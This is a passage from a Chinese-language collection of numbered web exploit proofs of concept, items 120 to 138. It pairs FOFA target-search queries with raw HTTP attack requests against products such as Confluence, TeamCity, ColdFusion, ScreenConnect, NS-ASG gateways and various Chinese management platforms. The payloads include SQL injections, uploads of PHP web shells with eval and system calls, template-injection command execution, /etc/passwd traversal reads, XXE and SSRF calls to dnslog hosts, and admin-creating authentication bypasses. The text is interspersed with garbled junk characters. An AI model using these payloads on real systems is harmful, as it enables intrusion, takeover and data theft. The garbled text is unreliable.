Sec-Fetch-Site: same-origin" T; N, f# z: u7 o' f) F! B
X-Forwarded-For: 1.1.1.1
' F8 [' T5 n& } H" R: f' CX-Originating-Ip: 1.1.1.15 \2 C% |* S% M) `( W8 X
X-Remote-Ip: 1.1.1.1 F) i5 I+ s3 J2 r3 a- J" [: n. d
X-Remote-Addr: 1.1.1.1
- ~. c' _, p8 q6 J2 r! {Te: trailers
# O9 @: |- F" p- b1 J7 SConnection: close7 Q) G v9 Q; D5 D/ C8 O
' ?4 S# M1 t3 W7 X( _src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456% F0 h, V- j3 S& `& {, o8 c5 ~
7 i$ T, E* @. L& `& D* Q Y E, \% x
; @* m6 c/ V3 P2 c7 e% m8 G
120. 北京百绰智能S40管理平台导入web.php任意文件上传 B$ m7 Y* [& d: x2 W1 o* V' A1 p
CVE-2024-12537 m* d3 y# w, N) L
FOFA:title="Smart管理平台"6 \2 E+ S/ x4 F3 M! _* Q% E& Q
POST /useratte/web.php? HTTP/1.1
3 R9 k9 c, \. V" Z3 m) pHost: ip:port# T0 [8 }* Z0 r9 N0 {
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
+ R* c I% a: dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 ]9 v' g) \8 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
D' `! U$ x- Y9 S9 o* c2 R$ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& l% z6 m; A% Q( HAccept-Encoding: gzip, deflate
& k' e8 T# g. E" ZContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
E2 g" L: _) m6 N3 h1 |% PContent-Length: 5970 z( W7 i, c. r. X. N( m4 J9 k0 k
Origin: https://ip:port, A0 ^* {, h/ Q6 P/ Z
Referer: https://ip:port/sysmanage/licence.php
D2 t9 |" _4 n* v. Y3 K( m, H3 uUpgrade-Insecure-Requests: 1
/ Z( H- G: X5 ]& R% e7 LSec-Fetch-Dest: document
, m* N0 A7 V0 J' HSec-Fetch-Mode: navigate: V- s3 Y) K1 Y# v. H
Sec-Fetch-Site: same-origin4 m, b U; U( b; s# R6 g
Sec-Fetch-User: ?1
0 W8 N4 X- x; o# H- K: \Te: trailers3 U( W, |$ n% n. `0 y
Connection: close
" `. Q7 r' w7 B* h+ l6 J+ @, X- t: |+ H) i' K
-----------------------------423289041236658752706300793283 @. c6 Y. n5 t
Content-Disposition: form-data; name="file_upload"; filename="2.php"
0 G, z: \" o; C2 \Content-Type: application/octet-stream7 r! n' a/ }! _% a" d
' m/ ~5 H7 d1 N* o" u$ i; i<?php phpinfo()?>
$ b/ x* o" P8 w$ w! |8 _9 F" l-----------------------------42328904123665875270630079328/ {8 H# d8 Y2 {, ]6 z5 r: u4 H6 \
Content-Disposition: form-data; name="id_type"
! }) b0 o7 s; g0 R2 w. y" q( ~! Y5 t. _
17 Y- c# K* W8 J, q9 g
-----------------------------42328904123665875270630079328/ N3 D* S3 e, w2 Y: [+ ]) O
Content-Disposition: form-data; name="1_ck"
1 h: i. `4 K8 h8 j" p6 W$ k5 N0 K7 @$ H. {
1_radhttp( a1 }7 q" ?) Y4 T
-----------------------------42328904123665875270630079328
% I( r: {" }. ~5 s9 h9 v0 v- j TContent-Disposition: form-data; name="mode"
3 r9 n: ?) d: {. H+ u/ g
" i/ G% [% ]0 wimport
9 q4 I$ t3 @: Z2 n0 j( r-----------------------------42328904123665875270630079328
4 y& O6 e+ J* c1 h% \1 J" c: ]% ]" d: C9 Y
Y# {" J- H1 P/ T: E9 H文件路径/upload/2.php S, w2 t% X4 G+ F7 T. s# v, k; i
+ E8 w2 D5 Y7 G121. 北京百绰智能S42管理平台userattestation.php任意文件上传- [6 T1 b) g) g4 s5 i
CVE-2024-19181 c2 U. R9 }9 H) ~7 Y! H+ O
FOFA:title="Smart管理平台"4 {/ @% O% Z# ^5 J) d7 s
POST /useratte/userattestation.php HTTP/1.1# p4 S" ]& B2 ]. D# i9 }4 J {4 i
Host: 192.168.40.130:84439 m6 f, L6 P7 s3 t) {$ o) ?
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
- ^# J0 ?8 A. N8 x+ X. R1 v& IUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# h y5 B, o. [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, k& J: e7 e) g; ]% O [" p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 a) h+ q- Z0 ?3 w. S9 w* e
Accept-Encoding: gzip, deflate
* G2 O% ^; m+ N3 ]* A/ BContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793284 L: F' m, i8 Y) F( R( q2 `& M0 |
Content-Length: 592
1 q. o8 s7 ]% @; g. _/ ]; }Origin: https://192.168.40.130:8443
% K: J# A% }' S M- B! H4 rUpgrade-Insecure-Requests: 1
- n: z+ A4 e* B$ \; i* _. h5 u1 S$ NSec-Fetch-Dest: document
( i# c3 \, ?! l6 Z, B- }1 |Sec-Fetch-Mode: navigate5 Y* v( |+ F* t; `
Sec-Fetch-Site: same-origin
% _- M, x$ M5 n2 t5 T1 ?7 @9 `; JSec-Fetch-User: ?1. X# q! F. B% @! g, K Q
Te: trailers
; A- I) L! e0 X0 C7 e3 h1 NConnection: close
0 B- R1 W/ P' K5 P: Q9 c! j( r: h) @4 i
-----------------------------42328904123665875270630079328
# A/ s# o5 E. `6 d1 `. qContent-Disposition: form-data; name="web_img"; filename="1.php", G9 o# e8 Y+ L
Content-Type: application/octet-stream
4 c9 [$ y9 d4 E5 y: C# G! L4 j6 u
8 w" D! `) i) H: o6 s/ R<?php phpinfo();?>! y# w) o; ^2 V( V0 n/ P: v8 ]
-----------------------------42328904123665875270630079328: ?- n8 O- c7 e* L8 x
Content-Disposition: form-data; name="id_type"5 ?* a, S- [- @5 Y: y7 W+ A& A7 W
/ D( D. f' a9 X+ x4 \" r1+ r) c9 y# m, k6 m) p4 l
-----------------------------42328904123665875270630079328
7 ^6 q- ~6 F, zContent-Disposition: form-data; name="1_ck"/ x9 L3 I2 C$ P
2 O) g/ j5 V6 c& j3 i9 m1_radhttp9 U. y3 w9 _& ^7 N
-----------------------------423289041236658752706300793287 ^& T* R0 c) m8 H9 A
Content-Disposition: form-data; name="hidwel"
3 ]8 g5 w4 m1 ` g ?2 w; P- A$ X3 x, T/ M3 n; F# q$ U
set4 V3 ?# B& \5 p3 g# ^
-----------------------------42328904123665875270630079328
% G3 e( K0 L# |
; F+ f$ P; ?$ q. ]# Z
. I3 s6 E0 i2 v& `' W3 bboot/web/upload/weblogo/1.php/ p: Q o- L9 S' b; }4 m+ V/ g; C/ g! u
& a0 T5 J: b2 k* M0 s& T
122. 北京百绰智能s200管理平台/importexport.php sql注入/ [3 F* c+ k9 x: Z; W& L: L
CVE-2024-27718FOFA:title="Smart管理平台". s7 N& n. L' f/ p3 I+ v( G5 c
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
/ u1 ]* g' P2 v2 y {* EGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.17 O/ D& x. y& q9 g
Host: x.x.x.x
& R% l- _6 J5 d, t. xCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
+ t" o ~9 }+ h, [$ X/ {5 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, P' ?/ D* L. r% ]% _$ U, o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 z$ s& T2 W7 X" m* y' @9 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& j; x* @% t" |% sAccept-Encoding: gzip, deflate, br
, _9 I- ]( ~. `2 y5 O+ b" i2 V7 }2 HUpgrade-Insecure-Requests: 1
9 m' r- f3 |7 Q t. h TSec-Fetch-Dest: document! R, P: r( d" m0 R
Sec-Fetch-Mode: navigate- y; M* U5 B _3 g. _. d) T
Sec-Fetch-Site: none5 l0 Y1 o" ^' @! {+ G
Sec-Fetch-User: ?1. f4 u `: Q7 B8 {3 d. D
Te: trailers
% u2 a( |/ Q; xConnection: close: m2 u/ Y- C1 ?1 C- x1 [
U( M; X+ O5 l% \& v0 v6 d. V/ _
; l1 T& W% L8 X( A. ?% y
123. Atlassian Confluence 模板注入代码执行
2 W$ i4 c. `6 s( S% l/ z9 ]" ^) CFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"( }- y3 l1 E4 F9 a
POST /template/aui/text-inline.vm HTTP/1.1( K' |- e7 {$ l" N# v- h
Host: localhost:8090, Z' B( ?9 f: f& H# b7 I
Accept-Encoding: gzip, deflate, br2 G2 A9 S* @# `/ y$ c$ `
Accept: */*- A; V1 Y J3 |5 s% u/ r" S* R7 D0 C
Accept-Language: en-US;q=0.9,en;q=0.8
6 A* C9 e! S+ i8 j* NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36/ E. j- |7 b; \8 C, F
Connection: close
/ j4 ~; i* I, Z, {, Y6 j4 j7 uContent-Type: application/x-www-form-urlencoded
& t3 Y$ O, n2 r& V4 m2 _! u( x/ O4 Z/ b; r- r9 n
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
) D, }' }% y: U' c1 ^- M! v* F4 a4 g9 Y. t5 \4 s2 ~
3 b1 h! @3 P) T1 R4 ^; b124. 湖南建研工程质量检测系统任意文件上传
- g/ s0 h6 L/ FFOFA:body="/Content/Theme/Standard/webSite/login.css"
8 j! L5 S/ v0 S% l* S2 Y A) W; d RPOST /Scripts/admintool?type=updatefile HTTP/1.1
% Y% F' j- k( k, P( e# ^& bHost: 192.168.40.130:8282, `3 Y9 a7 q% j# \8 u
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 C' |6 ]( O$ B" Q, G t
Content-Length: 72* m1 {5 B3 Y- _! b4 H6 |- V) ^: _' p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8: }- B3 |3 t7 s# M
Accept-Encoding: gzip, deflate, br
' x( r/ s; n9 Q& `% S9 v$ {/ \: WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 c) m7 p3 G! j' N# _1 Y
Connection: close6 ^7 j5 c' `, O, M
Content-Type: application/x-www-form-urlencoded. g- z9 e# C5 H X! o
. o8 D6 Q( f5 x; B7 y. A% h
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
* [; Q# T6 J" l" S2 E5 k3 m' Y' ~) _
9 U+ a9 H9 _4 y- f/ V% u* N; hhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
. @; D# j6 ]( P& P" p
2 }* ~. b" [- ?* T125. ConnectWise ScreenConnect身份验证绕过
0 r! s4 j$ u/ Y5 U* h4 WCVE-2024-1709! L5 g8 j- S, ]9 v7 ]
FOFA:icon_hash="-82958153"
# y; E% u4 M" ?; g y) dhttps://github.com/watchtowrlabs ... bypass-add-user-poc7 M _9 E# ]$ M" q
9 t; k3 k& K+ v
1 C1 m- f% u' j. I7 ~% `# h# v使用方法$ t# P, C( z9 R) E) C# ]
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
) h0 A O T; I' @2 L$ E0 `0 k5 {' l% |7 A. z
w' G& W. n4 b' s! c$ L8 @$ r创建好用户后直接登录后台,可以执行系统命令。
9 Y7 o; y4 b% x/ J5 q# @: o0 k5 K: g5 i& j9 e# S5 @
126. Aiohttp 路径遍历6 I f* [+ S! n( J0 `1 t6 t5 B
FOFA:title=="ComfyUI". ^+ q0 n N# M& V- ~$ n
GET /static/../../../../../etc/passwd HTTP/1.14 u: k5 I' z' B/ g: ^' _2 j3 U
Host: x.x.x.x
! \6 L! i/ S% g7 q s; \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 j! f6 a* }: ^9 sConnection: close
6 c$ \3 r) z$ n: d2 WAccept: */*+ v. ^4 B, r4 [6 e
Accept-Language: en
) w* {: F+ ~- T1 Q0 P# H' DAccept-Encoding: gzip
( v+ E6 j6 K- W" h W6 u C3 w) P# e0 b* T/ _ ^9 b8 F
L0 Q* N5 o, A3 h. B* D5 v# k127. 广联达Linkworks DataExchange.ashx XXE4 B4 X, D& D* g. R5 Q
FOFA:body="Services/Identification/login.ashx"
/ F( N4 i; `3 p7 BPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1* H3 A0 @5 A1 X) w1 y0 ]4 B' J" W
Host: 192.168.40.130:8888
7 ~% K* g4 D4 Q; pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
" Z9 e% o% |. g) w9 _3 b PContent-Length: 415, d! ~7 P( d4 [" [5 Z+ G# j( _( E n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! n3 T- }" n. r2 \4 p4 o
Accept-Encoding: gzip, deflate# C% l) i t6 g6 H& ?- ~
Accept-Language: zh-CN,zh;q=0.9
- J! L; I% b; h7 M, CConnection: close% s: P. L. i8 L' J" ?! W
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0& S3 G) v) s; ]1 R
Purpose: prefetch
9 w9 e3 }# ^. p+ w# X2 n0 Z2 g6 ~Sec-Purpose: prefetch;prerender; e* Y% j8 q; G1 T1 ]9 |, a
% o3 E5 ^( s( O" T# O5 q' x------WebKitFormBoundaryJGgV5l5ta05yAIe0- w3 y" b M4 S/ Y
Content-Disposition: form-data;name="SystemName"
" n% S6 w( S3 S+ `# |) p) k0 d, @' w7 f- r
BIM. a G' E+ \0 A4 @4 u
------WebKitFormBoundaryJGgV5l5ta05yAIe0& p2 G. C4 E& k5 s8 ]
Content-Disposition: form-data;name="Params"
( x. Y' A* l1 c2 L; d6 c5 B& LContent-Type: text/plain' I0 O( P: K8 q5 S3 b
% R6 s4 ~8 i. V) W% z
<?xml version="1.0" encoding="UTF-8"?>
$ B1 m" F: M+ R( Q1 I4 r1 H8 C, i<!DOCTYPE test [
: _4 @5 I3 m( k( u1 F& |' X<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
8 X. j2 Q+ }0 I* Z$ `]
. |, e l* }2 L, A9 T7 e' f' k; s8 ]>/ \* N0 i9 N4 j9 Y
<test>&t;</test>
* l6 \ n: v' D$ k* E------WebKitFormBoundaryJGgV5l5ta05yAIe0--
- p/ Z6 o8 x# @6 ]3 g0 K0 t9 u5 n0 V. ]$ U' |# E/ b, H4 ?4 p) F/ M
W- |1 M2 e: I, K, J% U# a/ c7 z3 y
b9 s# P( y4 h1 G8 G/ ]. ^$ D
128. Adobe ColdFusion 反序列化. l' `. r- c8 S4 E$ l
CVE-2023-38203
# `8 o& }; j, ~# H {$ V- JAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
$ l/ W9 G6 {' W+ i* i7 MFOFA:app="Adobe-ColdFusion"
7 l; h; x8 _* s* C( ]+ [, [- Q; rPAYLOAD. W" G4 K w' Z: p: ]* p3 |
6 o* G o9 z4 k& R. x+ k8 G/ }129. Adobe ColdFusion 任意文件读取
4 e6 ]: Q5 `5 @9 bCVE-2024-20767
$ b, N3 a6 g2 I- u. T, A) l: W4 zFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request". V( K7 \# l" Y# w j6 B
第一步,获取uuid
4 ?; s& X0 ]* t, ]# ^9 f( }GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1( g# j. r9 D+ N0 S1 E9 n
Host: x.x.x.x- V; L: q6 Z+ x9 e _* E* R7 ~5 _6 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" n6 ]* J* k9 }) t& rAccept: */*7 r9 I) V* }: i0 K) S" G) R7 l
Accept-Encoding: gzip, deflate
: R! K# a" }1 h0 i0 Q. G0 N3 xConnection: close% }# q a4 \9 Y0 ^
1 ^0 A% O3 j* c, p% z# }
" Q7 l. D. w& x
第二步,读取/etc/passwd文件8 ]2 H# N, u9 S* `
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
' K- n1 t# J3 p# e* S! OHost: x.x.x.x1 J! d; i# [2 h4 |% B; v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 d7 G. {! |9 H. ]& Z& I; F- D! `
Accept: */*; |' D5 i& g: P# K3 Q4 a V
Accept-Encoding: gzip, deflate
; D5 H1 `" t7 y& Y" v4 x- BConnection: close7 @2 f N5 J1 r
uuid: 85f60018-a654-4410-a783-f81cbd5000b9: C" z3 _2 k. x- q
5 h7 _) w! F) @$ U6 q. y( \# t" q
5 C- M+ g) \! U5 C2 @3 f130. Laykefu客服系统任意文件上传* Q1 ]7 J; Z8 ~8 A
FOFA:icon_hash="-334624619"2 h& U9 t- p7 ?% d6 G2 d1 R( T* C
POST /admin/users/upavatar.html HTTP/1.1$ c# a. r! q9 q0 D9 i. x& Z
Host: 127.0.0.16 B( H5 P" o. o7 Z
Accept: application/json, text/javascript, */*; q=0.01' b' F/ M% h+ c" U
X-Requested-With: XMLHttpRequest
- \, ?# L3 F. G3 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26. v0 K- [) {8 B: y+ } g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
2 r0 @$ j: d' U) G. W/ BAccept-Encoding: gzip, deflate
8 _. w+ Z! P: iAccept-Language: zh-CN,zh;q=0.9
- s/ v/ ^6 \7 g# ]( q8 JCookie: user_name=1; user_id=37 H1 D4 B2 o$ T% O" g
Connection: close1 \* X" |* w* y2 M5 c9 g5 c
& b$ Y# g2 R) o
------WebKitFormBoundary3OCVBiwBVsNuB2kR
" _. U3 i3 h5 I; ]Content-Disposition: form-data; name="file"; filename="1.php"
) v/ T% {: V# u& |Content-Type: image/png
# H) F$ p; [/ J4 D1 A 0 V/ F$ U l) O9 j( t7 I0 w
<?php phpinfo();@eval($_POST['sec']);?>8 o8 T$ p+ U% p) n
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 z" f# t5 \% m7 F
$ h2 f' B# Z4 W6 M8 M* S
# z2 P1 ]- j+ L: n8 @: e131. Mini-Tmall <=20231017 SQL注入- J6 z; s- p0 v5 h" p2 T) C
FOFA:icon_hash="-2087517259"4 d$ w5 e! B c$ l
后台地址:http://localhost:8080/tmall/admin
$ I( W8 E# k' R0 v& c% N+ Chttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
2 k/ B. J# P& p& x; D0 b! ^3 W% y( X7 f" i( y1 t" n
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
- Q7 Q& W8 m/ |7 \8 iCVE-2024-27198
3 X# m! x, {# ?7 t5 ?. E o) }FOFA:body="Log in to TeamCity"5 M8 r9 b, b' n9 ^4 b
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
4 u& @( H% J; ?; }! ?. eHost: 192.168.40.130:8111
: @- T+ f/ Q7 @% i9 L" }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 F+ c: m7 @& s7 _! Y' S
Accept: */*1 E% L6 | W8 F+ r) X3 b
Content-Type: application/json
4 o& Y3 z, Z- X- U: F9 oAccept-Encoding: gzip, deflate
4 }! _ w' F- m! A8 v o5 |& h& D: s* L i5 b# J; x3 Z& {8 O& [
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}! f' u5 [; n" y
2 L+ Z# Q2 V5 X* J" D4 t# B
6 `0 E- h# P0 w9 S+ w2 A \: l4 Z
CVE-2024-27199 J, M* U- t* N
/res/../admin/diagnostic.jsp2 T2 W+ i4 T$ k( Y7 R7 @0 V8 w
/.well-known/acme-challenge/../../admin/diagnostic.jsp
' E" W( L2 k7 u) W/update/../admin/diagnostic.jsp
( Y4 g# n9 t) u; }1 Y( O- F5 {* x1 g: d- a2 d8 @- r
5 O, w9 W- u+ _CVE-2024-27198-RCE.py, l# q% W7 F; B8 ~" f$ @7 b
1 K* m+ M, H! ]! o3 U
133. H5 云商城 file.php 文件上传
: f8 O s# i( N$ @1 m, }9 d; m' tFOFA:body="/public/qbsp.php"4 [9 v% }5 x! U* r' ?0 D8 T% F" K
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 C! B, ~6 g- x0 x4 o$ nHost: your-ip
* v8 m7 D7 r |& bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 w% j# l+ ]* e! F$ P9 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx$ E. T! A2 m6 v' `* Z( ]9 ~1 m8 T9 l
0 I! L2 M9 X- M+ U1 w1 G- F& x
------WebKitFormBoundaryFQqYtrIWb8iBxUCx% Y: K# v3 b7 @) I, [
Content-Disposition: form-data; name="file"; filename="rce.php"
: V/ a+ ]" _) @7 n. P7 l% zContent-Type: application/octet-stream( q/ ?) B# s" K9 _. ^
* ^9 f! `: V4 f0 r. [4 h
<?php system("cat /etc/passwd");unlink(__FILE__);?>) j$ p y- w( b) I% A
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
" m& l+ V. r# z- j( Z$ U+ C& n' G C& _" o* n
+ b/ J# O: [; i. N- h5 b- f) T' ~' G+ P9 T
134. 网康NS-ASG应用安全网关index.php sql注入4 ?5 K4 Z4 R; V) n7 u9 Z7 L
CVE-2024-2330
# Q/ g3 O# d1 S8 i' W$ W, MNetentsec NS-ASG Application Security Gateway 6.3版本, U% P) u: z8 G, _1 q
FOFA:app="网康科技-NS-ASG安全网关"
5 ~: Y1 ~& i- N1 I5 tPOST /protocol/index.php HTTP/1.1. _2 A6 d# A4 _
Host: x.x.x.x
0 {. E4 I( U5 MCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
& N1 v6 | L: O k& J# I: }+ MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& u/ A0 }) }3 Y5 M3 {% PAccept: */*6 t* M1 |( J2 \7 P7 {/ f2 M& K) A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( G' S: i& L6 U+ U
Accept-Encoding: gzip, deflate4 ~0 W7 K7 N; M* r4 i7 y
Sec-Fetch-Dest: empty0 P$ \4 s; ~% ], }1 O: U
Sec-Fetch-Mode: cors
- ~& Q. e8 N JSec-Fetch-Site: same-origin* E, g- w. ]2 H: Z+ K" }9 E* |
Te: trailers
% Z, y2 a4 {; ]& KConnection: close
1 [& P6 n4 u) F. AContent-Type: application/x-www-form-urlencoded( _7 T' S0 q3 S# D3 C
Content-Length: 263+ I% N2 u. Y1 _2 X8 m% m4 y
! S: S8 A2 g% y, N% a) y
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
0 |3 R/ [4 Y! i5 C& O- E( ~: ]1 W E- z, ~3 T
. q; \& Z) p$ R4 \0 f" p
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
& E( b( P4 N! h; I4 [$ X8 v0 f! W- ?3 WCVE-2024-2022
' v/ \3 z* D. M& d. cNetentsec NS-ASG Application Security Gateway 6.3版本0 X& T3 T4 d' b1 N& ^7 u
FOFA:app="网康科技-NS-ASG安全网关": S i% M0 ]. J
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1& Z6 V" z- b: j/ N5 S; Z
Host: x.x.x.x+ E, a/ z8 z# J; }% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 _. q0 Y$ X( S3 c+ n# mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; D+ s" P% u* [$ Y1 p! {
Accept-Encoding: gzip, deflate
# f+ C2 _* z9 [Accept-Language: zh-CN,zh;q=0.9" B) `! A, L" t z9 q2 _
Connection: close
; t8 m4 O* u8 _
9 K: _7 b5 v0 U9 a- e) _
3 c/ C! X( ?9 T( y" K) `1 v136. NextChat cors SSRF! J5 \% S* d6 b4 y/ D1 ?% B9 h
CVE-2023-497852 }6 j" l/ \/ L& s; d' q
FOFA:title="NextChat"
" {6 @3 u& } FGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1& o7 V, R8 ]) K* L/ A
Host: x.x.x.x:10000
/ c. q- C3 O3 G% dUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 ` v. B" M. e, LConnection: close2 C! `+ k* P. }8 @+ S
Accept: */*
4 a( B# m, R+ f6 h" KAccept-Language: en9 B. ?8 ]: x: G0 ~; e6 C- S
Accept-Encoding: gzip
" t& I. x: n* e5 q$ ~( { b* o9 d, b; W7 Z; P/ R3 G1 e
+ h. j2 U' w* e8 l3 V
137. 福建科立迅通信指挥调度平台down_file.php sql注入
" H$ w7 O. ^& }$ a3 }( N# D. h4 oCVE-2024-2620; {5 }/ g- C9 o, G/ U, v
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 O w$ p6 q, V' [/ h9 T
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
& ?( Y' ^% g3 [8 r- cHost: x.x.x.x
8 u0 r8 q& A, W0 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- ]0 \4 S' B3 @$ H& q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 y; j' S) v% |4 [( {* G* r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: K9 e" U- T* A f4 NAccept-Encoding: gzip, deflate, br6 g8 l7 t9 \9 K. M8 ?) K
Connection: close" f$ U) O h) o7 d* O8 z6 V! k
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj4 U/ t+ b1 s0 N% g* P6 j
Upgrade-Insecure-Requests: 17 d! L+ f! ~/ E7 w6 I: @5 R
5 j! B& @* ]7 p; k
" o7 S' J, i; ^: K' V$ C. V6 r
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' a4 s1 V. N; B( v2 \* L/ l. E- \CVE-2024-2621
% l) {* c* M$ @6 m% Q4 Z- ?: B. u+ eFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' x5 c t J4 [& K8 x- h5 R+ X
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.12 |! l4 k* u& J u$ v8 C1 w
Host: x.x.x.x
: |8 e8 z. P+ ` f. Q$ \9 e# HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" k# ~3 b9 _. {$ S9 ~( s7 z% l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: u4 s/ _6 ?+ E* Z3 X* G/ ^0 B
